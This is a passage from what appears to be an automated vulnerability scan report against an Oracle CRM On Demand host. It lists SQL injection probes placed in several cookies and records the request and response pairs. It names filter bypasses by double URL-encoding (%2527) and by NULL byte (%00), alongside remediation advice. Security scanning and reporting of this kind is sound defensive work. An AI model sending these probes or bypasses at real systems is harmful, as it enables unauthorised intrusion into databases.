s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:26:41 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "10c00c-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=60+0;age=0;ecid=50158730208872077,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%00''; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:23:05 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:27 GMT
ETag: "aa3e12-38fb-4af51f9eb45c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=196;ecid=49718178233452330,0:1)
Content-Length: 14587

/////////////////////////////////////////////////////////////////////////////
//
// Project : Web Content Management JavaScript Library (WCM)
//
// FileName : wcm.toggle.js
// FileType : Jav
...[SNIP]...

1.19. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [p_cur_URL cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/wcm/sitestudio/wcm.toggle.js

Issue detail

The p_cur_URL cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the p_cur_URL cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the p_cur_URL cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233%2527; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:25:41 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "70014-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=27;ecid=49473983572837249,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233%2527%2527; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:32 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:27 GMT
ETag: "aa3e12-38fb-4af51f9eb45c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=30;ecid=49937913055249439,0:1)
Content-Length: 14587

/////////////////////////////////////////////////////////////////////////////
//
// Project : Web Content Management JavaScript Library (WCM)
//
// FileName : wcm.toggle.js
// FileType : Jav
...[SNIP]...

1.20. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_nr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/wcm/sitestudio/wcm.toggle.js

Issue detail

The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522%2527; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:25:41 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "70014-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=24;ecid=49473687220090659,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522%2527%2527; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 10:09:34 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:27 GMT
ETag: "aa3e12-38fb-4af51f9eb45c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=1;ecid=49402201784416147,0:1)
Content-Length: 14587

/////////////////////////////////////////////////////////////////////////////
//
// Project : Web Content Management JavaScript Library (WCM)
//
// FileName : wcm.toggle.js
// FileType : Jav
...[SNIP]...

1.21. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_sess cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/wcm/sitestudio/wcm.toggle.js

Issue detail

The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%00'; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:25:38 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "10c00c-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=46;ecid=50157325754549082,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%00''; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 2

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 10:09:34 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:27 GMT
ETag: "aa3e12-38fb-4af51f9eb45c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=20;ecid=49403906886452225,0:1)
Content-Length: 14587

/////////////////////////////////////////////////////////////////////////////
//
// Project : Web Content Management JavaScript Library (WCM)
//
// FileName : wcm.toggle.js
// FileType : Jav
...[SNIP]...

1.22. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_wgw_lv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/wcm/sitestudio/wcm.toggle.js

Issue detail

The s_wgw_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_wgw_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_wgw_lv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912%2527; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 12:25:41 GMT
Last-Modified: Fri, 29 Jul 2011 09:29:03 GMT
ETag: "70014-192b-4a931e982d5c0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=16;ecid=49473081629694616,0:1)
Content-Length: 6443

<html>
<head>
<title>Error Page 404</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<link href="/error/ocom.css" rel="stylesheet" type="text/css">
<body style="margin: 0px" bgcolor=#ffff
...[SNIP]...

Request 2

GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
